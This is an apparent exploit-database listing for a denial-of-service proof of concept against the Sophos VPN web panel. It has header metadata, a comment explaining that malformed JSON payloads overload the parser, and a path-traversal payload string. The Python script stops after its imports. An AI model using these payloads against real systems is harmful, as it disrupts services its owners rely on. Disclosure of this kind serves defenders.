Sophos vpn web panel 2020 denial of service (poc) Vulnerability / Exploit
/
/
/
Exploits / Vulnerability Discovered : 2020-07-22 |
Type : webapps |
Platform : multiple
This exploit / vulnerability Sophos vpn web panel 2020 denial of service (poc) is for educational purposes only and if it is used you will do on your own risk!
[+] Code ...
# Exploit Title: Sophos VPN Web Panel 2020 - Denial of Service (Poc)
# Date: 2020-06-17
# Exploit Author: Berk KIRAS
# Vendor Homepage: https://www.sophos.com/
# Version:2020 Web Panel
# Tested on: Apache
# Berk KIRAS PwC - Cyber Security Specialist
# Sophos VPN Web Portal Denial of Service Vulnerability
# System parse JSON data. If we want to send some JSON with invalid data format
# for ex. valid -> {"test","test2"} , invalid -> {"test",PAYLOAD"test2"}
# The system can not parse this data fastly and service down
# payload_option2 ="../../../../../../../../../FILE./FILE"
#!/usr/bin/python3
import requests
import sys
import random
import threading